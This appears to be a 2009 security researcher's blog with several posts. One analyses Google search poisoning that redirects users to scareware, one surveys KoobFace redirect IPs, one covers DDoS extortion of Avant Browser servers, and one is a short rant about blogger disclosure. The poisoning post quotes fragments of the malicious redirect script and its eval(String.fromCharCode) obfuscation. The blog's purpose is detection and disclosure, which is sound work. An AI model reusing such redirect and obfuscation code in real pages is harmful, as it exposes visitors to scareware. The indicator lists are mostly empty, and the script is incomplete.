Alas it seems, with all of the publicity and all of the reports that Google have been sent, they've still not been bothered to remove the malicious domains from their Google index, or the malicious blogs on their Blogspot service (and yes, I'm aware Google aren't the only company with these problems, but they're the most popular so at present, are seeing the most abuse).

I've been monitoring the Google results since my last report on the Google poisoning issue, and have been saddened to see not a reduction in the amount of malicious URL's in the index - but an increase.

Almost every single one for this variation (there are of course other variations) I've seen thus far has had identical properties that for a search engine with a spider as good as Googles, should be easy enough to identify and erradicate;

1. All URL's lead to a page with;

  1. a 2.js file
  2. jibberish in <pre></pre> tags and further such .htm pages linked to each other under neath (all pages linked to, have identical properties)
  3. ALL pages on the domain link to each other, with identical tags (and ONLY link to these pages) and link to the 2.js file
  4. ALL pages have title tags that have the name of the .htm file in them 3 times, for example;

    cadets.htm - cadets (cadets on the waterfront, yesterday tractor cub cadets)
    broderick.htm - broderick (terrace dining room broderick, lillian broderick)
    prototype.htm - prototype (vecto prototype board, what is a prototype lexical relation)
    sli.htm - sli (p5n32 sli installation, bfg 7950 gt sli
    achat.htm - achat (achat immobilier bons en chablais, centrale achat electrom nager)
    etc etc etc ....

    Full results for two of the domains, can be found at;

  5. All links are encased in <tt></tt> tags.

2. All pages are in sub-directories that have jibberishly named folder names
3. The 2.js file ALWAYS begins with eval(String.fromCharCode(
4. The decoded JS contains;

function f(){

var r=document.referrer,t="",q;















window.location = (""+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");

window.onFocus = f()

Obviously, the URL that window.location takes you to, differs (seems to change every few days to a week or so).

5. The 2.js files are the same size (3K), though different MD5's
6. The resulting URL that window.location takes you to, ALWAYS go through intermediares, but invariably leads to a rogue that contains the usual scareware content, which again, should be a piece of cake for Google's spider to identify.

In the case of this is;
  3. (Intermediary)
  6. (PAYLOAD)

    Threat Expert:

7. The folder containing the files almost always has an open index, presumably to improve SEO
8. The parent folder of the folder containing the files, also has an open index, and contains a file called "c", the contents of which, contain the folders name (the one in the Google index), and "200"

With a file called 1t, containing the .htm file names;

A 1r file, containing the file and folder names in the format "folder/file.htm"

And finally, a randomly named PHP file (8.7K), whose content has always been <ok>

On a side note, it appears the rogue domain in this case, only allows a max of 2 connections per IP, as subsequent attempts result in it's returning a 404 (checking via a proxy confirmed this). It's also worth noting that attempts to grab the executable directly, aren't going to work as the filename is partially static, and partially dynamic (Setup-{random}_02004.exe), I've grabbed 4 seperate files thus far.

Bloggers bias - prepare for disclosure

I read on Bradley's blog that the FTC are considering changes that will finally force those bloggers giving rave reviews, to disclose the fact they've received a copy of whatever it is, for free - and it's about bloody time too.

I've seen hundreds of blogs just on the subject of antimalware, raving about a product, without disclosing the fact that they're getting paid to promote it, which is even worse.

I'll save my rant though. For details on this, see Bradley's blog;

Tuesday, 2 June 2009

Research: KoobFace -

I was asked by a friend if I could sniff out all of the IP addresses that the domain was redirecting to, and after spending over 30 mins trying to do it manually, decided to ask a few fellow researchers if they were aware of a way of doing it automatically - sadly they weren't.

I decided therefor, to throw something together myself to see if I could get the results I required, and the results were interesting.

I told the program to send 1000 requests to (spaced out of course), and had it list all of the IP's that it redirected to, including of course, the URL's themselves - out of the 1000 requests, there were only 296 unique IP addresses. Something I was not expecting.

The entire list is below for your blacklisting and/or researching pleasure.

And the list of IP's themselves;

I've not yet ran the list through hpObserver to get the PTR's for the IP's, but will do that later (absolutely knackered at the moment, and busy processing over 2000 other phishing domains).


hpObserver results (includes PTR) for the IP's;

Monday, 1 June 2009 Browser servers down

Just an FYI folks, both of the Avant Browser servers are currently down, and I can't get hold of Anderson (there's a number for him in China, but costs a bleedin fortune to call over there, so only gonna do that if I absolutely have to).

I've been on the phone to HopOne, who provide the dedicated servers for Avant, and they're going to reboot the main server as it is showing as unreachable, however, they can't do anything about the server, which also houses the sites, without Andersons approval, so they're going to send him an e-mail with a reboot request.

If I've not heard from Anderson by 21:00 GMT, I'll give him a call.

I'll update this post when I know more.

Affected servers

Affected sites

Apologies for any inconvenience.

/edit 02-06-2009 02:45

I am happy to report, all servers are now back online.

Initial investigations show the downtime was caused by an HTTP flooding attack against the Avant Browser website. Talking to Anderson revealed an attacker from China, incidentally the same country as Anderson, was flooding the server and had contacted Anderson via QQ (apparently the same as WLM) informing him he would not stop the attack until Anderson had paid him the amount asked for. Anderson informed me the attacker only asked for $300, which is the smallest amount I've ever heard of being demanded by an attacker.

At the present time, I don't have very much information on the attacker himself at present (I'll be getting more within the next day or two). However, analysis did show one thing in common - the user agent for all of the IP's he had attacking the servers, was identical;


Unfortunately for our attacker this made it extremely simple to identify and filter out the flooding, both at the server level, and once we'd given this information to the hosting company, at the hosting co level aswell. No doubt this won't stop him for long as the UA is obviously faked anyway, and can quite easily be changed, but we've also taken the step of adding extra security and filtering to the servers themselves, and have blacklisted the IP ranges of those identified.

The IP's we identified were;        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed        Resolution failed

I'll post more in due course.